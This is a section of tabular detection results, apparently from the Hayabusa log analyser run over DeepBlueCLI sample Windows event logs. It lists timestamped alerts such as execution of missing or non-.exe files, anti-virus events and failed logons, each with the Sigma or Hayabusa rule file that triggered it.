| 529 | 2016-08-20 05:47:29.854 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 530 | 2016-08-20 05:47:29.854 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 531 | 2016-08-20 06:47:30.500 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 532 | 2016-08-20 06:47:30.500 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 533 | 2016-08-20 08:02:19.515 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 534 | 2016-08-20 08:02:19.515 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 535 | 2016-08-20 08:02:22.296 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 536 | 2016-08-20 08:02:22.296 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 537 | 2016-08-21 01:03:05.348 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 538 | 2016-08-21 01:03:05.348 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 539 | 2016-08-21 05:05:57.517 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 540 | 2016-08-21 05:05:57.517 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 541 | 2016-08-21 05:05:59.973 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 542 | 2016-08-21 05:05:59.973 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 543 | 2016-08-22 06:00:11.001 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 544 | 2016-08-22 06:00:11.001 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 545 | 2016-08-22 06:03:27.106 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 546 | 2016-08-22 06:03:27.106 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 547 | 2016-08-22 06:42:09.518 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 548 | 2016-08-22 06:42:09.518 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 549 | 2016-08-22 06:45:28.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 550 | 2016-08-22 06:47:30.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 551 | 2016-08-22 06:47:30.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 552 | 2016-08-23 09:12:59.515 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 553 | 2016-08-23 09:12:59.515 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 554 | 2016-08-23 09:13:02.546 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 555 | 2016-08-23 09:13:02.546 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 556 | 2016-08-23 11:24:05.500 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 557 | 2016-08-23 11:24:05.500 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 558 | 2016-08-25 06:17:07.515 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 559 | 2016-08-25 06:17:07.515 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 560 | 2016-08-25 06:17:10.203 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 561 | 2016-08-25 06:17:10.203 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 562 | 2016-08-25 06:25:05.171 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 563 | 2016-08-25 06:25:59.734 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 564 | 2016-08-25 06:26:37.046 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 565 | 2016-08-25 06:27:31.828 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 566 | 2016-08-25 06:30:06.203 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 567 | 2016-08-25 06:38:23.076 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 568 | 2016-08-25 06:51:10.232 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 569 | 2016-08-25 06:51:19.681 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 570 | 2016-08-26 00:03:05.603 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 571 | 2016-08-26 00:03:05.603 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 572 | 2016-08-26 00:04:55.947 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 573 | 2016-08-26 05:43:45.515 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 574 | 2016-08-26 05:43:45.515 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 575 | 2016-08-26 05:43:48.140 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 576 | 2016-08-26 05:43:48.140 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 577 | 2016-08-27 05:34:49.928 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 578 | 2016-08-27 05:34:49.928 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 579 | 2016-08-27 09:43:11.500 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 580 | 2016-08-27 09:43:11.500 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 581 | 2016-08-28 00:20:56.556 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 582 | 2016-08-28 00:20:56.556 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 583 | 2016-08-28 00:31:15.759 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 584 | 2016-08-28 00:32:08.574 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 585 | 2016-08-28 00:32:35.199 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 586 | 2016-08-28 00:34:22.339 +09:00 | IE10Win7 | 4688 | high | Relevant Anti-Virus Event | | rules/sigma/builtin/application/win_av_relevant_match.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 587 | 2016-08-28 06:44:54.195 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 588 | 2016-08-28 06:44:54.195 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 589 | 2016-08-28 13:15:03.500 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 590 | 2016-08-28 13:15:03.500 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 591 | 2016-08-29 23:37:30.711 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 592 | 2016-08-29 23:37:30.711 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 593 | 2016-08-29 23:37:47.253 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 594 | 2016-08-29 23:37:47.253 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 595 | 2016-08-30 00:26:09.514 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 596 | 2016-08-30 00:26:09.514 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 597 | 2016-08-30 00:26:12.129 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 598 | 2016-08-30 00:26:12.129 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 599 | 2016-08-30 03:52:06.519 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 600 | 2016-08-30 03:52:06.519 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 601 | 2016-08-30 03:52:09.234 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 602 | 2016-08-30 03:52:09.234 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 603 | 2016-08-30 18:48:20.558 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 604 | 2016-08-30 18:48:20.558 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 605 | 2016-08-30 23:01:04.500 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 606 | 2016-08-30 23:01:04.500 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 607 | 2016-08-31 06:03:24.500 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 608 | 2016-08-31 06:03:24.500 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 609 | 2016-08-31 09:11:14.985 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 610 | 2016-08-31 09:11:14.985 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 611 | 2016-09-02 00:54:06.355 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 612 | 2016-09-02 00:54:06.355 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 613 | 2016-09-02 23:08:32.910 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 614 | 2016-09-02 23:08:32.910 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 615 | 2016-09-03 23:42:26.373 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 616 | 2016-09-03 23:42:26.373 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 617 | 2016-09-04 06:19:15.500 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 618 | 2016-09-04 06:19:15.500 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 619 | 2016-09-04 06:35:14.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 620 | 2016-09-04 06:35:15.664 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 621 | 2016-09-04 06:35:15.664 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 622 | 2016-09-04 06:37:55.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 623 | 2016-09-04 06:37:55.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 624 | 2016-09-04 22:32:03.952 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 625 | 2016-09-04 22:32:03.952 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 626 | 2016-09-04 22:32:29.279 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 627 | 2016-09-04 22:32:29.279 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 628 | 2016-09-15 11:13:19.927 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 629 | 2016-09-15 11:13:19.927 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 630 | 2016-09-15 23:50:14.730 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 631 | 2016-09-15 23:50:14.730 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 632 | 2016-09-16 05:09:55.941 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 633 | 2016-09-16 05:09:55.941 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 634 | 2016-09-18 07:53:42.819 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 635 | 2016-09-18 07:53:42.819 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 636 | 2016-09-18 07:56:46.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 637 | 2016-09-18 07:56:47.728 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 638 | 2016-09-18 07:56:47.728 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 639 | 2016-09-18 08:03:40.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 640 | 2016-09-18 08:03:40.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 641 | 2016-09-19 23:56:52.427 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 642 | 2016-09-19 23:56:52.427 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 643 | 2016-09-19 23:57:15.380 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 644 | 2016-09-19 23:57:15.380 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 645 | 2016-09-20 00:13:04.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 646 | 2016-09-20 00:13:05.415 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 647 | 2016-09-20 00:13:05.415 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 648 | 2016-09-20 00:15:08.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 649 | 2016-09-20 00:15:08.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 650 | 2016-09-20 01:50:06.477 +09:00 | DESKTOP-M5SN04R | 4625 | informational | Logon Failure - Username does not exist | User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
